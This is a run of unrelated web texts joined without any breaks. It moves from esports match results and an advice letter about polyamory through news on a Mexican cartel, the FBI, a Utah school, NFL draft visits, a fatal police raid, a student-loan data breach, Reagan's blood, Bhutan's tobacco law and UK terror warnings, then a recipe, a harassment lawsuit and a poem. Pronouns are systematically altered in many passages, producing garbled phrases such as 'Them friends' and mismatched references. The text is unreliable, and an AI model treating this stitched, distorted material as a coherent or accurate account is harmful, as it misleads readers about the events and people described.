Round 1 April 21st, 2016 - 13:00 KST LawLiet 2 1 Check April 21st, 2016 - 13:00 KST Lyn 1 2 ReprisaL April 21st, 2016 - 13:00 KST Moon 2 0 MinHyuk April 21st, 2016 - 13:00 KST Bany 2 1 FoCuS Round 2 April 21st, 2016 - 14:00 KST Moon 2 0 Check April 21st, 2016 - 14:00 KST ReMinD 1 2 MinHyuk April 21st, 2016 - 14:00 KST FoCuS 2 1 Lyn April 21st, 2016 - 14:00 KST LawLiet 0 2 ReprisaL Round 3 April 21st, 2016 - 15:00 KST Lyn 2 0 MinHyuk April 21st, 2016 - 15:00 KST Moon 1 2 ReprisaL April 21st, 2016 - 15:00 KST Bany 2 1 LawLiet April 21st, 2016 - 15:00 KST ReMinD 0 2 Check Round 4 April 21st, 2016 - 16:00 KST Bany 0 2 Lyn April 21st, 2016 - 16:00 KST FoCuS 0 2 LawLiet April 21st, 2016 - 16:00 KST ReMinD 2 0 ReprisaL April 21st, 2016 - 16:00 KST MinHyuk 2 0 Check Round 5 April 21st, 2016 - 17:00 KST Bany 1 2 ReMinD April 21st, 2016 - 17:00 KST ReprisaL 2 0 Check April 21st, 2016 - 17:00 KST FoCuS 2 0 MinHyuk April 21st, 2016 - 17:00 KST Moon 2 1 Lyn Round 6 April 21st, 2016 - 18:00 KST Moon 0 2 LawLiet April 21st, 2016 - 18:00 KST Bany 2 1 Check April 21st, 2016 - 18:00 KST FoCuS 2 0 ReMinD April 21st, 2016 - 18:00 KST MinHyuk 1 2 ReprisaL Round 7 April 21st, 2016 - 19:00 KST LawLiet 0 2 Lyn April 21st, 2016 - 19:00 KST Moon 0 2 ReMinD April 21st, 2016 - 19:00 KST Bany 2 0 ReprisaL April 21st, 2016 - 19:00 KST FoCuS 2 0 Check Round 8 April 21st, 2016 - 20:00 KST ReMinD 0 2 LawLiet April 21st, 2016 - 20:00 KST Lyn 2 0 Check April 21st, 2016 - 20:00 KST Moon 0 2 FoCuS April 21st, 2016 - 20:00 KST Bany 0 2 MinHyuk Round 9 April 21st, 2016 - 21:00 KST FoCuS 1 2 ReprisaL April 21st, 2016 - 21:00 KST ReMinD 0 2 Lyn April 21st, 2016 - 21:00 KST LawLiet 2 0 MinHyuk April 21st, 2016 - 21:00 KST Moon 1 2 Bany
After the 9th round, FoCuS and LawLiet were tied 5-3 (games) and 11-7 (maps), they played a decider to determine the third and fourth seed for playoffs.
3rd place decider April 21st, 2016 - 22:00 KST FoCuS 1 0 LawLiet
Playoffs [ edit ]
Semifinals ReprisaL 0 LawLiet 2 Lyn 0 FoCuS 2 Winners' Finals LawLiet 2 FoCuS 0 Losers' Round 1 ReprisaL 1 Lyn 2 Losers' Finals FoCuS 1 Lyn 3 Grand Finals LawLiet 2 Lyn 3
Map statistics [ edit ]
It's really difficult for me to talk about feelings in a relationship.
Dear Jess,Having been polyamorous for over six years, your article, "I Fell For The Perfect Guy, But Not For Their Open Relationship," piqued my interest. I wanted to be there along with you on this journey, and even felt a lot of hope in your claim that this relationship helped you to "better understand and accept the kind of relationship [you] really needed." After all, you seemed to treat each other fairly, and admit that this was a hard relationship for you. I appreciated that honesty.But by the end, I felt ill at ease. It wasn't just because you called your relationship (even facetiously) a "social experiment" and gathered "evidence" (which made wonder if you had started dating 'Greg' in order to write an article in the first place). It wasn't even just because of what I thought were completely irrelevant comments about their "equipment."It was that when I got to the end and you said that you grew to "understand the qualities that will make [you] a great girlfriend," I wasn't convinced.The part that convinced me the most was when you admitted this:This fact was shown to me so many times in this article that, had this been one of my students' essays, I would have suggested this be the thesis instead. You are absolutely correct that feelings are difficult to talk about. I learn this anew every day. But trying to get better at it is crucial, because you will not have the satisfying, healthy, loving, monogamous relationship you want if you don't work on communicating with yourself and with anyone you date in the future.You started out your article by claiming you wanted no expectations in your relationships, but this is an impossible goal.relationship we have with every person we know comes with expectations, and the most healthy relationships are those in which expectations are managed realistically by all parties . We're sad when friends aren't there when we need them. We're disappointed when family members fail to call on our birthdays. And yes, we're devastated when a lover is unfaithful. We value things like "reliability" and "loyalty," and those values are based in meeting expectations. And you can't ask someone to meet your expectations if you don't tell them what they are.For example, you were upset when, after sitting through Greg's art class, they didn't come home with you. You even said you had "thrown down the cash to attend," your vocabulary making it sound like you had not only expected it, but were owed it. If you had merely asked them what they planned after class, maybe you wouldn't have felt so cheated out of your money and time. Maybe you would have realized that yes, this was work, but they were probably also very happy to have you there, and it was nice to see them in their element. Or maybe you would have decided you'd rather meet on a different night, when they were more free to give you what you wanted.You also seemed to have very specific expectations about the relationship label you wanted, and what that label meant to you; where you wanted a relationship to go, and how quickly you got confirmation it was going there; and the distance you wanted to keep from Greg's fiancée, Cassy. And although you do talk about learning all of these things by the end of the relationship, it seems very clear that you were not able to communicate them early enough (or maybe at all) to Greg himself.I think you've already started doing the work - you're clearly reflecting on your feelings and assessing how different your expectations were. As you go forward, I hope that you will ditch the vague assertions in your dating profiles and really think about you want. And after that, tell. Tell all your future boyfriends that to you, love means staying over after sex. Tell them that it means wanting the relationship to go somewhere committed. Tell them it means exclusivity. And after you tell them, listen to what love means to them. The expectations will not always match up. But I can guarantee that you will always be closer to your goal than you were before.Best,Kate
• A version of this post ran on the author's site, Insightcrime.com. The views expressed are the author's own.
In the midst of a years-long fight against the Zetas for control of prized sections of borderland territory, the Gulf Cartel is increasingly relying on a previously untapped resource: women.
As Excelsior reported last week (in Spanish):
The army has evidence that women have begun to occupy important positions inside the Gulf Cartel; in [Reynosa] they have begun to obtain information that not only is the number of women who are dedicated to assassinations rising, but they have also gone from managing safe houses and administering funds to carrying out intricate operations for the purchase and smuggling of drugs and undocumented immigrants ...The Gulf Cartel has bet on women to come and fortify an organization that has been worn down by casualties suffered in confrontations with the Zetas.
Despite being one of the most powerful groups in Mexico over the past two decades, more than two years of warfare with the Zetas, their one-time enforcer arm, along with the arrest of a number of leading figures, have rendered the group a shell of its former self. As InSight Crime reported last month, of the men who led the group at its height in the early 2000s, the only remaining figure is Eduardo Costilla, alias “El Coss”. Yet Reynosa, a Tamaulipas town of some 600,000 people across of the border from McAllen, Texas, remains a Gulf Cartel stronghold in the group's dwindling swatch of territory in northeastern Mexico.
While often overlooked, women playing a role in organized crime groups is nothing new in Mexico. As InSight Crime has noted, the number of women working in the drug trade is estimated to have grown by 400 percent between 2007 and 2010. This includes a number of now-notorious figures, principal among them Sandra Avila, who earned notoriety as the "Queen of the Pacific" following their 2007 arrest for accused drug trafficking. Many of the initial charges were subsequently dismissed, though they remain in jail on money laundering charges, and an extradition request from the US is pending.
The idea of an all-powerful female criminal boss has spilled out into Mexican popular culture as well. "La Reina del Sur," a novel about a Sinaloa woman forced to flee their homeland, who subsequently sets themselves up as a major trafficker in southern Spain, is among the most popular recent pieces of crime lit, and was spun off into a telenovela with longtime star Kate del Castillo. Scores of "narcocorridos" (drug ballads) have been written about leading females in the drug trade, and a handful of non-fiction accounts of their exploits have appeared on the shelves of Mexican book stores.
In most cases the role of women is portrayed as secondary, and their involvement comes across as isolated cases of happenstance – Avila, for instance, married their way into the drug trade – rather than as part of a broader strategy. In Reynosa, however, the women are not mere add-ons, but, according to Excelsior, central figures.
Insofar as the use of women is a shift forced upon the Gulf Cartel by difficult circumstances, it demonstrates the group's weakening. If Gulf leaders have been forced to turn to women, who they consider less effective, because they could not maintain their operation otherwise, this is an indication of a group that may be in its last days.
Such a lack of access to manpower could well have been provoked by the Zetas' success in identifying Gulf reinforcements sent from elsewhere in the country; their efforts to wipe out these fighters have been blamed from the mass disappearance of bus passengers in Tamaulipas in recent years.
An alternative interpretation, however, is that the Mexican gangs' failure to integrate women into their organizations represents a needless and limiting oversight. Just as legitimate multinational corporations have benefited from the influx of women into their boardrooms, so too could smuggle organizations increase their efficiency by no longer ignoring half the population.
Get the Monitor Stories you care about delivered to your inbox. By signing up, you agree to our Privacy Policy
– Patrick Corcoran is a writer for Insight – Organized Crime in the Americas, which provides research, analysis, and investigation of the criminal world throughout the region.. Find all of their research here.
Get daily or weekly updates from CSMonitor.com delivered to your inbox. Sign up today.
Submitted by Mike Krieger of Liberty Blitzkrieg blog,
Recently, the FBI made a significant change to its self-proclaimed primary focus in its fact sheet from “law enforcement” to “national security.” This change merely confirms what I and countless others have claimed to be true for quite some time. That the entire regulatory, security and intelligence apparatus of these United States has been redirected away from protecting the Constitution and the rule of law, toward a narrow focus on protecting the economic and social positions of the oligarch class at all costs under the guise of a “war on terror.” We have seen many signs of cronyism at the FBI for decades now, something most accurately pointed out in the priceless image “All My Heroes Have FBI Files.”
While this change to the FBI fact sheet is just confirmation of something we already knew, it's still mind-boggling to see it shoved right in our faces:
TechDirt covered this story well. Here are some excerpts:
A couple years ago, it was revealed that the FBI noted in one of its “counterterrorism training manuals” that FBI agents could “bend or suspend the law and impinge upon the freedoms of others,” which seemed kind of odd for a government agency who claimed its “primary function” was “law enforcement.” You'd think that playing by the rules would be kind of important. However, as John Hudson at Foreign Policy has noted, at some point last summer, the FBI quietly changed its fact sheet, so that it no longer says that “law enforcement” is its primary function, replacing it with “national security.” Of course, I thought we already had a “national security” agency — known as the “National Security Agency.” Of course, while this may seem like a minor change, as the article notes, it is the reality behind the scenes. The FBI massively beefed up resources focused on “counterterrorism” and… then let all sorts of other crimes slide. Including crimes much more likely to impact Americans, like financial/white collar fraud. So… what has the FBI been doing? Well, every time we hear anything about the FBI and counterterrorism, it seems to be a case where the FBI has been spending a ton of resources to concoct completely made up terrorism plots, duping some hapless, totally unconnected person into taking part in this “plot” then arresting them with big bogus headlines about how they “stopped” a terrorist plot that wouldn't have even existed if the FBI hadn't set it up in the first place. And this is not something that the FBI has just done a couple times. It's happened over and over and over and over and over and over and over and over and over and over and over and over again. And those are just the stories that we wrote about that I can find in a quick search. I'm pretty sure there are a bunch more stories that we wrote about, let alone that have happened. All of these efforts to stop their own damn “plots” screams of an agency that feels it needs to “do something” when there's really nothing to be done. Thousands of agents were reassigned from stopping real criminals to “counterterrorism” and when they found there were basically no terrorists around, they just started making their own in order to feel like they were doing something… and to have headlines to appease people upstairs. The government seems to have gone collectively insane when it comes to anything related to “terrorism.”
Once again ladies and and gentlemen: USA! USA!
Full article here.
A high school in Utah has installed showers and washing machines for its homeless students in a bid to encourage attendance.
Officials at Salt Lake City's East High School said homelessness was a real issue in the community and they believe up to 100 of their students do not have daily access to a shower or washing machine.
The school has now installed two washrooms, with a shower and a washing machine and dryer, that students can use before, during or after school.
We'll tell you what's true. You can form your own view. From 15p €0.18 $0.18 $0.27 a day, more exclusives, analysis and extras.
"I don't want to go to work if I don't have clean clothes, I don't want to go to work if I wasn't able to shower," Principal Greg Maughan told Fox13.
"It's to feel like they fit in, to feel like they are part of something, and they don't stand out. And the more likely they are to attend, the more likely they are to succeed in class, to graduate and to move on to college and a career."
Senior student Emily Beatse said some students are “sneaky” and use the theatre department's washing facilities on a Saturday when they know no one will be around.
"A lot of them don't have them in their own homes, and a lot of them are afraid to ask like their friends or someone else," they said.
Shape Created with Sketch. End Youth Homelessness Sleep Out 2016 Show all 14 left Created with Sketch. right Created with Sketch. Shape Created with Sketch. End Youth Homelessness Sleep Out 2016 1/14 Manchester 2/14 Manchester 3/14 Edinburgh Jon Savage 4/14 Edinburgh Colin Hattersley Photography 5/14 Edinburgh Colin Hattersley Photography 6/14 Edinburgh Colin Hattersley Photography 7/14 Edinburgh Colin Hattersley Photography 8/14 Edinburgh Colin Hattersley Photography 9/14 Eden Project, Cornwall 10/14 Eden Project, Cornwall 11/14 Sheffield James Rothwell 12/14 Norwich 13/14 Cardiff 14/14 Cardiff 1/14 Manchester 2/14 Manchester 3/14 Edinburgh Jon Savage 4/14 Edinburgh Colin Hattersley Photography 5/14 Edinburgh Colin Hattersley Photography 6/14 Edinburgh Colin Hattersley Photography 7/14 Edinburgh Colin Hattersley Photography 8/14 Edinburgh Colin Hattersley Photography 9/14 Eden Project, Cornwall 10/14 Eden Project, Cornwall 11/14 Sheffield James Rothwell 12/14 Norwich 13/14 Cardiff 14/14 Cardiff
The school has a particularly humanitarian approach, and each week volunteers stock shelves in the school's free food pantry.
Chapman-Richards Cares, a local non-profit group, donated the washing machine.
The new washrooms are scheduled to open next week, and students are trying to give them a creative name. Suggestions reportedly include The Leopard Lounge or Leopard Laundry.
We'll tell you what's true. You can form your own view.
At The Independent, no one tells us what to write. That's why, in an era of political lies and Brexit bias, more readers are turning to an independent source. Subscribe from just 15p a day for extra exclusives, events and ebooks – all with no ads.
Subscribe now
The 2017 NFL draft is less than one month away.
Leading up to the start of the draft on April 27, the Buffalo Bills will host 30 prospects on pre-draft visits and hold private workouts with other draft eligible players.
NYup.com will keep this list updated on prospects that the Bills are showing interest in leading up to the draft.
Pre-draft visitors
Nyeem Wartman-White, LB, Penn State (Reported by Josh Reed)
Chad Kelly, QB, Ole Miss (Local pro day - Does not count toward top-30 visits)
Phillip (P.J.) Walker, QB, Temple (Reported by Aaron Wilson)
Marcus Sayles, CB, West Georgia (Reported by NFL Draft Diamonds)
Garett Bolles, OT, Utah (Reported by Adam Caplan)
Marlon Humphrey, CB, Alabama (Reported by Ian Rapoport)
Nathan Peterman, QB, Pitt (Reported by Adam Caplan)
Chad Williams, WR, Grambling State (Reported by Rapoport)
Tedric Thompson, S, Colorado (Reported by Rapoport)
Grover Stewart, DT, Albany State (Reported by Tony Pauline)
Nate Hairston, CB, Temple (Reported by Sal Capaccio)
Cam Robinson, OT, Alabama (Reported by Rapoport)
Derek Rivers, DE, Youngstown St. (Reported by NFL Draft Diamonds)
Rivers confirmed the original report by NFL Draft Diamonds. He'll be traveling to Buffalo on April 11.
The small-school pass-rusher was dominant in their career with Youngstown St. This year, Rivers recorded 58 tackles, 19.5 tackles for loss and 14 sacks. They finished their career at Youngstown St. with 37.5 career sacks and 56.5 tackles for loss.
Tim Williams, EDGE, Alabama (Reported by NFL Draft Diamonds)
Williams is a talented player, but they have some red flags. They admitted to failing several drug tests during their time with the Crimson Tide and was once arrested on a gun charge in September of 2016. Williams has the ability to develop into a solid pass rusher in the NFL.
Private workouts
Marquell Lee, LB, Wake Forest (Reported by Aaron Wilson)
Josh Harvey-Clemons, S, Louisville (Reported by Wilson)
Ryan Radke, WR, Thiel (Local pro day)
Cameron Johnston, P, Ohio State (Reported by NFL Draft Diamonds)
Tre' Sullivan, DB, Shepherd (Reported by NFL Draft Diamonds)
Tyler Scalzi, TE, Texas Tech (Reported by Houston Chronicle)
Luke Stice, FB, Houston (Reported by Houston Chronicle)
Scalzi and Stice both caught passes for Patrick Mahomes in their private workout with Buffalo.
Jordan Morgan, OL, Kutztown (Reported by Tony Pauline)
DeShone Kizer, QB, Notre Dame (Reported by Tom Pelissero)
Mitchell Trubisky, QB, North Carolina (Reported by Mike Garafolo)
Nathan Peterman, QB, Pitt
Brad Seaton, OT, Villanova (Reported by Aaron Wilson)
Seaton is viewed as a late round prospect. They registered 30 consecutive starts during their time at Villanova. Seaton is close to 6-feet-9-inches tall and weighs 330 pounds.
Brandon Barnes, TE, Alabama State (Reported by Pauline)
Patrick Mahomes, QB, Texas Tech (Reported by Ian Rapoport)
A police SWAT team search houses for the second of two suspects wanted in the Boston Marathon bombings takes place April 19, 2013 in Watertown, Massachusetts. Thousands of heavily armed police staged an intense manhunt Friday for a Chechen teenager suspected in the Boston marathon bombings with their brother, who was killed in a shootout. Dzhokhar Tsarnaev, 19, defied the massive force after their 26-year-old brother Tamerlan was shot and suffered critical injuries from explosives believed to have been strapped to their body. AFP PHOTO / TIMOTHY A. CLARY (Photo credit should read TIMOTHY A. CLARY/AFP/Getty Images)
Note: The "Raid of the Day" features accounts of police raids I've found, researched, and reported while writing my forthcoming book Rise of the Warrior Cop: The Militarization of America's Police Forces. It's due out in July, but you can pre-order it here.
Brenda Van Zweitan, 51, was shot and killed during a 2010 drug raid on their home by the Broward, Florida Sheriff's Department. According to police, Van Zweitan was holding a handgun when they approached them in the home, and then refused to drop it when ordered to do so. Van Zweitan's boyfriend was arrested without resistance.
In the weeks before the raid, however, Van Zweitan had been robbed, and the man they believed committed the robbery had threatened them on the Internet. Them friends and family also pointed to the fact that they had no prior criminal record, and that the police entered the home in a particularly aggressive and terrifying manner -- by smashing through a sliding glass door -- to suggest that they likely aren't aware that the armed intruders in their home were police. Van Zweitan was also a PTA member, a grandmother, and a local political and environmental activist.
The raid came after two suspects police had arrested claimed to have bought marijuana and prescription drugs from Van Zweitan. The police reported finding prescription pills plus small quantities of a variety of illicit drugs in the house, although Van Zweitan's boyfriend was charged only for possession of marijuana. (Her family said after the raid that they had valid prescriptions for the pills.) The SWAT officers who shot them were later cleared of any wrongdoing.
Van Zweitan was the third person in five years killed by area SWAT teams conducting drug raids.
The federal government now faces a third class-action suit over the loss of a portable hard drive containing personal information about more than half a million people who took out student loans.
The law firms of Sutts, Strosberg LLP, Branch MacMaster LLP and Falconer Charney LLP are seeking $600-million in compensation on behalf of those affected by the loss of the hard drive.
This latest class-action lawsuit comes on the heels of two similar actions launched this week.
Story continues below advertisement
Last week, Human Resources and Skills Development Canada revealed it had lost a device containing data on 583,000 Canada Student Loans Program borrowers from 2000 to 2006.
The missing files include student names, social insurance numbers, dates of birth, contact information and loan balances of borrowers, as well as the personal contact information of 250 department employees.
Borrowers from Quebec, Nunavut and the Northwest Territories during this time period are not affected.
No banking or medical information was on the portable device.
The loss of the hard drive from an office in Gatineau, Que., across the Ottawa River from Parliament Hill, came to light as the department looked into another breach – a missing USB key containing the personal information of more than 5,000 Canadians.
Human Resources went public with the second, more far-reaching loss last week – more than two months after an employee discovered that an external hard drive was missing.
"We are shocked that the government of Canada has known about this breach of privacy for so long without revealing to the country what happened," Falconer Charney lawyer Ted Charney said in a statement.
Story continues below advertisement
Story continues below advertisement
The department had no comment on the lawsuits.
"Should litigation be formally commenced, the Department (of) Justice will respond on behalf of HRSDC," a spokesperson said in an email.
The RCMP and the privacy watchdog are investigating the lost data.
Human Resources is sending letters to affected people, for whom it has current contact information, to advise them on how to protect their personal information.
A toll-free number has been set up at 1-866-885-1866 (or 1-416-572-1113 for those outside North America) to help people determine whether they are affected.
Medical community says sale of former president's blood is unethical, but it joins a long history of such bodily transactions
A vial of what is purported to be blood from late president Ronald Reagan is on sale at an online auction house, sparking outrage from their estate and the medical community.
A seller at PFCAuctions.com – purveyor of "world class art, antiques and collectibles" – listed the vial of "dried blood residue from President Reagan" on Sunday.
By Tuesday afternoon, bidding had reached $12,000.
The vial is alleged to have come from the laboratory where the president's blood was sent for testing after John Hinckley shot Reagan on March 30, 1981.
"My mother worked for Bio Science Laboratories in Columbia, Maryland," the unnamed seller writes.
"Her laboratory was the laboratory contracted by the Walter Reed Army Medical Center as well as the George Washington University Hospital to handle blood testing as well as other types of testing."
The seller added that their mother, who has since passed away, asked if they could take the vial home with them after Reagan had been treated.
Now, 30 years later, the seller was told by the Ronald Reagan presidential library that they would consider taking the specimen as a donation. "I was a real fan of Reaganomics and felt that Pres Reagan themselves would rather see me sell it rather than donating it," the seller writes.
"If indeed this story is true, it's a craven act and we will use every legal means to stop its sale or purchase," John Heubusch, executive director of the Ronald Reagan Presidential Foundation, said in a statement.
The medical community was similarly outraged.
"You don't go selling people's specimens or bodily fluids," Dr. Joseph Giordano, who was head of the trauma team that treated the president, told a local television station. "You have no permission to do that. It's unethical."
Reached by phone Tuesday afternoon, a spokesperson at PFCAuctions declined to comment on any of the ethical questions that have been raised.
"The Ronald Reagan library had said they would take it as a donation, so this person decided to auction it with us instead. Aside from that there is not much to comment on," they said.
A long history of selling human remains
Unethical or not, the selling or displaying of celebrity remains is perhaps as old as the notion of celebrity itself.
Galileo's finger was removed when the corpse was exhumed and now sits on display at the Museum of the History of Science in Florence, perched inside a glass chalice.
Galileo's finger sits on display in Florence. Photograph: Fabrizio Giovannozzi/AP
Most famously, and perhaps apocryphally, a tissue specimen that may have been Napolean Bonaparte's penis was sold as part of the "Vignali collection" of Napoleonic relics for $800 in 1924. In 1977 it was acquired by an American urologist, John Kingsley Lattimer, for the equivalent of $10,000 today.
Lattimer died in 2007, and their estate, which is still in possession of the emperor's member, is considering selling it.
Pop singer Michael Jackson was reported to have expressed interest in purchasing some or all of the remains of John Merrick, better known as the Elephant Man, who famously suffered from a congenital disease which created abnormal and excessive bone growth on their skull.
Jackson's offers, which were confirmed by London hospital's chief administrator David Edwards in 1987, were rebuffed.
Dorothy Jarlett worked as another singer's housekeeper for many years in the 1960s. They and John Lennon allegedly became close enough for Lennon to give them a tooth they had removed by their dentist, as one does.
Although the tooth is too fragile to conduct DNA tests on it to confirm original ownership, last year Michael Zuk, a dentist in Alberta, spent more than $31,000 to buy the incisor at an auction. They said their plan was to have it mounted in their office.
A lock of Che Guevara's hair – removed by a CIA operative after the revolutionary was killed in 1967 – was purchased for $100,000 in 2007. Bill Butler, a Texas bookseller, keeps it on display in their store.
(Newser) – Bhutan is apparently not messing around with its strict new anti-smoking rules. Cops busted a 24-year-old monk and charged them with illegally possessing tobacco, a felony that could land them in jail for 5 years. Bhutan, which aims to become the world's first smoke-free nation, bans cigarette sales in the country. Citizens can smoke privately but are limited to 200 cigarettes or 150 grams of tobacco products a month that can be imported legally, explains Reuters.
The problem is, people must produce a customs receipt to prove they got the stuff legally, and the monk didn't have one.  They are the first person charged since police got expanded authority to raid homes and shops and question smokers. "He can be charged with smuggling of controlled substances, which is a fourth-degree felony," said a police official. (Read more Bhutan stories.)
• 5 potatoes/750g (I use maris piper potatoes)
• handful of fresh coriander (around 20g)
• 1 red chilli
• 1 tsp of cumin
• 1 tsp of paprika
• 1 tsp of turmeric
• 1 tsp of chili powder
• juice of 1 lemon
• 2 cloves of garlic
• salt and pepper
• 3 tbsp of olive oil
• flour (I use gram flour)
For the sauce:
• 750g cherry tomatoes
• 4 cloves of garlic, crushed
• 6 tbsp olive oil
• salt and pepper
For the sautéed greens:
• 1 large head of broccoli
• olive oil
• salt and pepper
• 400g spinach
• 1 lemon
METHOD
Peel the potatoes and chop them in half, then place them in a saucepan of cold water.
Cook the potatoes for 30 to 40 minutes, until they're really soft. At this point drain the water and place them in a mixing bowl.
Preheat the oven to 180C/gas mark 4.
Finely chop the coriander and the chilli.
Once the potatoes have cooled add all the remaining ingredients (except the flour and oil) and mash together until the potatoes are smooth and you have a delicious mix.
Drizzle olive oil on to a baking tray and then dust it with flour.
Shape the potato mix into four cakes on the tray, then place in the oven to cook for about 20 minutes, until the tops start to go golden brown.
Take the cakes out the oven, place them on the bed of sautéed greens and pour the garlic tomato sauce on the top to serve.
Chop the tomatoes into quarters and place them into a saucepan with the crushed garlic, olive oil, salt and pepper.
Let the mix simmer for about 20 minutes, to coincide with the completion of the cakes.
Chop the broccoli into small pieces and place it in a frying pan with a little olive oil, salt and pepper.
Sauté the broccoli for about five minutes, then slowly add the spinach until it has wilted.
Once all is cooked, drizzle the lemon juice on top.
MORE RECIPES FROM DELICIOUSLY ELLA
Deliciously Ella: raspberry and coconut mousse recipe
Deliciously Ella butternut squash, bean and quinoa stew recipe
Britain could be hit 'at any moment' by a Sydney-style terror attack, David Cameron told MPs last night.
The Prime Minister said the Australian attack, in which two hostages died and Islamic extremist Man Haron Monis was killed, was a reminder of the danger Britain faces.
They said it was only through the efforts of the security services that plots to murder UK police officers ‘in cold blood' had been foiled in recent months.
Prime Minister David Cameron said Australia was a country 'very close to our hearts', and warned the attack in Sydney could be repeated in the UK
Mr Cameron told MPs on the Liaison Committee that the threat Britain faced 'definitely' included lone-wolf attacks like in Sydney
But they warned it was much harder for the authorities to prevent attacks by fanatics who are ‘self-radicalised on the internet' than to tackle known extremists who had travelled to the Middle East.
The Prime Minister, appearing before senior MPs at the Commons Liaison Committee, said: ‘The threat we face definitely includes this sort of self-starting, sometimes quite random attacks that could happen at any moment in Britain.
‘We've seen over the last few months there have been a series of plots that have been detected and prevented that would have seen police officers or other authorities murdered in cold blood.
‘It's thanks to the brilliance of our security services that these things have been prevented.'
But they added: ‘We can't count on them to prevent it every time because it is one thing understanding the terror networks coming out of Pakistan or Afghanistan or Iraq and Syria, trying to monitor what they're doing, who's going and who's returning. That's one thing.
‘But people who are self-radicalised on the internet, who then suddenly do appalling things, that is much more difficult to prevent.'
The Prime Minister's remarks come amid widespread horror at the twin terror attacks in Sydney and Pakistan which have left more than a hundred people dead.
In Sydney, the Iranian asylum seeker Monis struck terror into the heart of the city's financial district after taking 17 staff and customers hostages inside the Lindt cafe in Martin Place for 16 hours.
The 50-year-old gunman is believed to have fired the first shots, which sparked teams of heavily armed police to swoop on the café at 2am on Tuesday.
Tori Johnson, the café manager, and barrister mother-of-three Katrina Dawson were the two hostages killed during the bloody climax to the stand-off.
The tragedy came before Taliban gunmen stormed a school in Pakistan and slaughtered 132 children today.
The 34-year-old manager of the Lindt cafe, Tori Johnson (left), and mother of three Katrina Dawson, 38 (right), have been named as the two hostages killed during the Sydney siege on Tuesday morning
FEARS MILITARY HARDWARE FROM AFGHANISTAN COULD BE ATTACKED BY TERRORISTS Convoys of UK and American military hardware being shipped back from Afghanistan could face attack by terrorists, it is feared. Thousands of vehicles and containers of equipment are being brought home as part of the withdrawal of Nato combat troops. Some will be transported by land and sea, via Pakistan. But one of the main routes to the port of Karachi is through Peshawar, the scene of yesterday's Taliban attack. A second, more southerly route goes via the city of Quetta, a base for the Afghan Taliban that has been plagued by sectarian violence.
Speaking before the siege in Australia came to an end yesterday Mr Cameron warned that the tragedy may have been played out more than 10,000 miles away, but it could be repeated in Britain.
The security services have warned ministers that an attack in the UK from such a fanatic is ‘almost inevitable'.
Andrew Parker, the director of MI5, warned last year that Britain was facing a grave terror threat, including from ‘several thousand' Islamist extremists who are living here and want to attack the country.
In August, the UK's threat level was raised from ‘substantial' to ‘severe' amid increasing concerns that hundreds of jihadis were returning to British streets from the wars in Iraq and Syria.
Last week, police forces across Britain were put on alert after a warning of an Islamist plot to kidnap and behead an officer.
More than 7,000 officers in the West Midlands – the UK's second-largest force – were warned they were in imminent danger following a telephone threat.
It follows last year's savage murder of soldier Lee Rigby in broad daylight. There are also fears that hundreds of people are being radicalised in British prisons.
The soldier was murdered by two Muslim converts who ambushed them as they walked back to their barracks in Woolwich, South East London, last year.
Mr Cameron called on Muslim communities in Britain to do more to stand up, oppose extremists and say they are ‘not speaking in my name'.
They suggested the perception of Muslims as ‘victims' must be challenged as part of efforts to stamp out radicalism.
Gunman Man Haron Monis, pictured here protesting charges against them earlier this year, held 17 people hostage in the Lindt cafe
They admitted it was a ‘worry' so many people seemed to be being radicalised in public institutions such as schools.
But they said the Coalition's proposed new duty on figures of authority to report concerns about radicalisation could help to address the problem.
The Prime Minister told LBC Radio: 'Obviously it's an extremely worrying situation. It demonstrates the challenge we face of Islamist extremist violence all over the world.
Met police chief Sir Bernard Hogan-Howe warned of the threat posed by lone wolf attacks
'This is on the other side of the world but is the sort of thing that could just as well happen here in the UK or in Europe.'
They said Australia was a country 'very close to our hearts', adding: 'We very much stand with the Australians at their time of need. It is a reminder of the threat that we face and the need to be vigilant.'
Police and security officials have warned it is 'almost inevitable' that Britain will be hit by an attack by fanatics who have been 'militarised' by Islamic State.
Mr Cameron announced last month that an extra £130million will be made available over the next two years for the security services to 'monitor and disrupt those self-starting terrorists'.
A new legal obligation will be imposed on universities, prisons, councils and schools to play their part in tackling 'this poisonous extremism', the Prime Minister said.
Mr Cameron told MPs: 'The reason for providing some extra money today is that there is a specific and growing challenge from these self-starting—they are sometimes called 'lone wolf'—jihadis, who have been radicalised on the internet because of what has been happening in Syria but are not necessarily linked up with other terrorist networks.
'That puts extra pressure on and we need to respond to that.'
The security agencies face unprecedented pressure to prevent similar attacks by extremists acting alone, but it is much harder to detect and disrupt plots if they are not part of a wider terror network.
Met police chief Sir Bernard Hogan-Howe warned: 'It doesn't take an awful lot of organising, doesn't take too many to conspire together, there's no great complexity to it.
'So that means we have got a very short time to interdict, to actually intervene and make sure that these people don't get away with it.'
Unveiling new laws to counter the extremist threat, Home Secretary Theresa May revealed 40 terrorists plots have been thwarted in Britain since the July 7 attacks nine years ago.
The foiled atrocities including 'marauding' 'Mumbai-style' gun attacks streets, an attempt to blow up the London Stock Exchange and airplanes, and murder troops and a British ambassador.
'Bachelor' Producers Sued by P.A. You Asked If I Ever Had Anal Sex!!! WB Denies Allegations
'Bachelor' Producers Sued for Sexual Harassment by Production Assistant (UPDATE)
EXCLUSIVE
2:30 PM PT -- Warner Bros. tells us, "We take all allegations of workplace harassment very seriously. These allegations were brought to our attention and were thoroughly investigated earlier this year. Our findings did not support the plaintiff's characterization of the events claimed to have taken place, which is why we are disappointed by the filing of this lawsuit."
The company that produces the 'Bachelor' franchise, along with several of its producers, has a sexual harassment case on its hands -- a former employee now claims producers repeatedly asked them sexually invasive questions that they say had nothing to do with the show.
Becky Steenhoek is suing Warner Bros. Entertainment and several producers from the show claiming they asked their gratuitous questions, including:
-- How often do you masturbate?
-- Do you own sex toys/dildos?
-- Have you ever had anal sex?
-- Do you enjoy giving hand jobs?
-- Is your vagina shaved? Do you have a landing strip?
-- Has a man ever got your "taco" talking?
Steenhoek says these questions were designed to embarrass them because of their "sexual inexperience and conservative views about sex."
They claim a week after complaining about the comments they were fired.
We reached out to Warner Bros. for comment ... so far, no word back.
Rearranging Furniture
You wanted the couch to stay against the
wall but I wanted to move it to the other
side of the room and when you walked
away from me and I ran after you all the
way down the stairs only wrapped in my
blanket I tripped over the couch and by
the time I had stumbled all the
way down the stairs you were gone
gone
gone so I moved the
couch to the other side right
under the slanted ceiling so I had to duck every
time that I stood up but it didn't matter because you were
gone
gone even though you said that you
loved me.
And then you were back and you said that you
liked where I moved the couch as well as where I moved the
bed that we shared and I didn't want your approval but I
had it and that was okay because you were
back and you wanted to be there with
me but only for
a little while
because then you were gone
gone but this time I didn't chase
